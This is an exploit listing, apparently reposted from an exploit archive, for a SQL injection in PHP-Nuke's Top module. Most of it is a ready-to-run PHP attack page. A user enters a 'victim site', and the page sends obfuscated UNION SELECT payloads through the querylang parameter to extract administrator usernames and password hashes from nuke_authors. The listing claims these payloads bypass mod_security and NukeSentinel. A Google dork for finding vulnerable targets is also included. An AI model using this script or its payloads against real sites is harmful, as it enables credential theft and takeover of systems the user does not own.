Exploit for PHP-Nuke Top Module SQL Injection

## https://sploitus.com/exploit?id=PACKETSTORM:182093
# Exploit Title: PHP-Nuke ( SQL injection Top Module + protection Bypass )  
# Google Dork: intext: Powered by PHP-Nuke  
# Date: 2024-10-07  
# Exploit Author: Emiliano Febbi  
# Vendor Homepage: https://phpnuke.org/  
# Software Link: https://sourceforge.net/projects/phpnuke/files/phpnuke/  
# Version: 6.x < 7.6  
# Tested on: Windows 10  
  
[code] ->New concept of exploit writing, CMS protections are useless. ->Very fast usage.  
  
<?php  
echo '<html><head><title>PHP-Nuke SQL injection / Bypass Protections</title></head><body><center>  
<body bgcolor="black"><body link="yellow">  
<font color="white">  
<pre>new exploit concept  
######################################################################  
#This exploit is for Top Module of PHP-Nuke 6.x < 7.6 #  
#auto-bypass *illegal operation* , *mod security* , *NukeSentinel* #  
#allowed http and https protocols. Code by Emiliano Febbi #  
######################################################################  
</pre><form action="'.$SERVER[PHP_SELF].'" method="POST">  
<font color="red">~ insert victim site ~ </font>(*the folder must be specified)<br>  
<input type="text" name="victim" value="http://www.site.com"><br>  
<label for="dlt"><font color="white">++method++</font></label>  
<select name="exploit_nuke" id="lang"><option value="one">#1</option>  
<option value="two">#2</option></select><br><input type="submit" value="launch!"/><br>  
</form></font></body></html>';  
if($_POST['victim']) {  
$site = $_POST['victim'];  
$j = $_POST['exploit_nuke'];  
switch ($j) { /*#method1*/  
case "one":  
/*#Get info from victim site*/  
if (false!==file("$site/admin.php")) echo "<a href='$site/admin.php'>~Admin Login Found!</a><br><br>";  
else echo "<font color='yellow'>~missing Admin Login</font><br><br>";   
if (false!==file("$site/modules.php?name=Top")) echo "<font color='yellow'>#Top Module Active!</font><br>";  
else echo "<font color='yellow'>#Top Module not Active!</font><br>";  
print '<font color="white">--------------------------------------<br></font>';  
/*#Get user1*/  
print "<font color='white'>#user1:<br><font color='lime'>";  
$content_user=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--");  
$comment_user=explode('<a href="modules.php?name=Surveys&pollID=1">',$content_user);  
$comment_user=explode("</a>",$comment_user[1]);  
var_dump(strip_tags($comment_user[0]));  
echo "</font><br>";  
/*#Get pwd1*/   
print "#password1:<br><font color='red'>";  
$content=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--");  
$comment=explode('<a href="modules.php?name=Surveys&pollID=1">',$content);  
$comment=explode("</a>",$comment[1]);  
var_dump(strip_tags($comment[0]));  
echo "</font><br>";   
/*#Get user2*/   
print "#user2:<br><font color='lime'>";  
$content_user2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--");  
$comment_user2=explode('<a href="modules.php?name=Surveys&pollID=1">',$content_user2);  
$comment_user2=explode("</a>",$comment_user2[2]);  
var_dump(strip_tags($comment_user2[0]));  
echo "</font><br>";  
/*#Get pwd2*/   
print "#password2:<br><font color='red'>";  
$content2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--");  
$comment2=explode('<a href="modules.php?name=Surveys&pollID=1">',$content2);  
$comment2=explode("</a>",$comment2[2]);  
var_dump(strip_tags($comment2[0]));  
echo "</font><br>";  
break;  
/*###################################################################################################################################*/  
case "two": /*#method2*/  
/*#Get info from victim site*/  
if (false!==file("$site/admin.php")) echo "<a href='$site/admin.php'>~Admin Login Found!</a><br><br>";  
else echo "<font color='yellow'>~missing Admin Login</font><br><br>";   
if (false!==file("$site/modules.php?name=Top")) echo "<font color='yellow'>#Top Module Active!</font><br>";  
else echo "<font color='yellow'>#Top Module not Active!</font><br>";  
print '<font color="white">--------------------------------------<br></font>';  
/*#Get user1*/  
print "<font color='white'>#user1:<br><font color='lime'>";  
$content_userj=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--");  
$comment_userj=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userj);  
$comment_userj=explode("</a>",$comment_userj[1]);  
var_dump(strip_tags($comment_userj[0]));  
echo "</font><br>";  
/*#Get pwd1*/   
print "#password1:<br><font color='red'>";  
$content_userp=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--");  
$comment_userp=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userp);  
$comment_userp=explode("</a>",$comment_userp[1]);  
var_dump(strip_tags($comment_userp[0]));  
echo "</font><br>";   
/*#Get user2*/  
print "#user2:<br><font color='lime'>";  
$content_userz=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--");  
$comment_userz=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userz);  
$comment_userz=explode("</a>",$comment_userz[2]);  
var_dump(strip_tags($comment_userz[0]));  
echo "</font><br>";  
/*#Get pwd2*/   
print "#password2:<br><font color='red'>";  
$content_userq=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--");  
$comment_userq=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userq);  
$comment_userq=explode("</a>",$comment_userq[2]);  
var_dump(strip_tags($comment_userq[0]));  
echo "</font><br>";  
break;  
};;  
};;;  
?>  
[/code]